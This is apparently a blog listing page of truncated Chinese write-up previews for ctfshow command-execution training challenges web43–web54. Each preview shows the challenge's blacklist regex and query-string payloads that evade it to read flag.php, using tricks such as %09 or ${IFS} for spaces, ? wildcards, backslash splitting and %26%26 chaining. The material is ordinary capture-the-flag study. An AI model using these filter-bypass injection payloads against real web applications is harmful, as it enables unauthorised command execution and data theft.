![](https://img-blog.csdnimg.cn/20201014180756930.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
ctfshow web入门 命令执行
qq_58042554
这个作者很懒,什么都没留下…
展开
-
ctfshow web入门 命令执行
一、web54过滤了;|.*c.*a.*t.*|.*f.*l.*a.*g.*||[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c..原创 2021-11-23 20:54:39 · 285 阅读 · 0 评论 -
ctfshow web入门 命令执行
web53一 、原创 2021-11-22 20:51:06 · 204 阅读 · 0 评论 -
ctfshow web入门 命令执行
一、web521.过滤了;|cat|flag||[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\<2.dev/null(空洞)二、解决过程?c=nl${IFS}/????||原创 2021-11-20 20:43:35 · 122 阅读 · 0 评论 -
ctfshow web入门 命令执行
一、web511.过滤了;|cat|flag||[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x262.dev/null(空洞)二、解题过程/?c=nl%3C%3Efla\g.php||原创 2021-11-20 20:08:41 · 218 阅读 · 0 评论 -
ctfshow web入门 命令执行
web50一、过滤了;|cat|flag||[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26dev/null(空洞)二、解题方法/?c=tac<>fla\g.php||ls(使用<>代替空格 <>和?同时使用不回显 所以用\代替?)...原创 2021-11-18 21:09:46 · 61 阅读 · 0 评论 -
ctfshow web入门 命令执行
web49一、1、过滤了;|cat|flag||[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|2、dev/null(空洞)二、解题过程方法一:/?c=tac%09????.???||方法二:/?c=tac%09fla?.php%26%26ls(%09代替空格 %26%26代替分号)...原创 2021-11-18 20:50:06 · 154 阅读 · 0 评论 -
ctfshow web入门 命令执行
web48一.1. 过滤了;|cat|flag||[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|2.dev/null(空洞)二、解题过程方法一:/?c=tac%09fla?.php%26%26ls(%09替代空格 %26%26替代分号)方法二:?c=tac%09????.???||(%09代替空格)...原创 2021-11-18 20:41:20 · 166 阅读 · 0 评论 -
ctfshow web入门 信息搜集
web47一.过滤了|cat|flag||[0-9]|\\$|\*|more less head sort taildev/null二.解题过程/?c=tac%09fla?.php%26%26ls(%09代替空格,%26%26代替分号)原创 2021-11-15 20:48:31 · 67 阅读 · 0 评论 -
ctfshow web入门 命令执行
web46一.过滤了cat flag 空格 数字 $ *dev/null(空洞)二.解题过程 1./?c=tac%09fla?.php%26%26ls(%09代替空格,%26%26代替分号) 2./?c=more%09????.???||(需检查源代码)...原创 2021-11-15 19:47:03 · 45 阅读 · 0 评论 -
ctfshow web入门 命令执行
web 44一.多过滤了一个flag ; catdev/null(黑洞)二.解题过程方法一:/?c=tac fla?.php%26%26ls(%26%26为分号的编码)方法二:1./?c=more????.???||(需检查源代码) 2./?c=morefla*.php||(需检查源代码) 3./?c=morefl\ag.php||(需检查源代码) 4.?c=morefl'...原创 2021-11-15 19:36:36 · 48 阅读 · 0 评论 -
ctfshow web入门 命令执行
【/dev/null 2>&1 理解为黑洞;信息输入被掩埋】/?c=tac flag.php;ls(;为双绕过)原创 2021-11-11 20:43:33 · 239 阅读 · 0 评论 -
ctfshow web入门 命令执行
web45一.过滤了falg cat ; 空格dev/null(空洞)二.解题过程:1./?c=tac%09fla?.php%26%26ls(%09替代空格,%26%26替代分号) 2.?c=more%09fla*.php||原创 2021-11-15 19:29:08 · 182 阅读 · 0 评论